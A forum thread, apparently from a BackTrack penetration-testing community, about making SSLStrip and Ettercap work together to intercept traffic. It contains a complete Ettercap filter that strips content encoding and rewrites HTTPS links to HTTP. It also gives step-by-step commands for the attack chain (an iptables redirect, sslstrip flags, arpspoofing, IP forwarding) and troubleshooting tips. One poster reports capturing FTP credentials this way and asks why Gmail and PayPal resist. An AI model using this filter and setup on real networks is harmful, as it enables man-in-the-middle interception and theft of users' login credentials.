SSLStrip & Ettercap not playing nicely together in BT5R1

[comaX]

http://www.pentestit.com/update-ettercap-074/
There you go. Don't know why I associated that with MS. I guess I got confused somewhere in my RSS feed.

[comaX]

http://www.pentestit.com/update-ettercap-074/
There you go Don't know why I associated that with MS. I guess I got confused somewhere in my RSS feed.

[DeserTEagLe]

An alternative to using sslstrip with ettercap.This ettercap filter (https downgrade)works.

Code:

##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
   }
}

#####################
## Replace Content ##
#####################

##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
  # msg("[HTTP Response Filter] HTTP request seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
}

##
# Response
if (ip.proto == TCP && tcp.src == 80) {
  # msg("[HTTP Response Filter] HTTP response seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
}

[ericmilam]

@DeserTEagLe Good work there on that filter. Quick question, what happens if the server doesn't accept the downgrade, is the user prevented from hitting the HTTPS site?

Meaning, when SSLStrip & Eettercap work together, if sslstrip can't downgrade to http, traffic still passes over 443 and the victim is presented with the ettercap certificate to accept. Does this work the same way?

It seems the traffic would be blocked to https. So http sites that redirect to https automatically may end up in an infinite loop.

What do you think?

[DeserTEagLe]

It seems the traffic would be blocked to https. So http sites that redirect to https automatically may end up in an infinite loop.

What do you think?

Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it

[Arsenius]

Hello everyone,
for some reason i cant seem to get this working
i am running BT5R2, i edit my /etc/etter.conf file.
enter this ip route line: "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000"
i start sslstrip -a -k -f
use arpspoof
run ettercap (version 0.7.4.1)
set ip_forward to 1

when i test it with my test pc and i go to a ftp server it works, i get the username\pw
but when i go to mail.google.com or paypal.com i get a ssl error site.

1 thing I notice is when i do iptables -L i see 3 chains (input\forward\output) nothing more.

any advice would be appreciated !

[ericmilam]

Why are you running ettercap & Arpspoof? Ettercap can do MiTM. Also, to ensure ettercap is using the proper conf file I use the -a switch ( -a /etc/etter.conf) just to be sure

What browser are you using? It seems chrome has extra security measures to protect against MiTM in my experience.

Here's what I would do, make sure you installed easy-creds during the R2 upgrade and then use that to see if it works.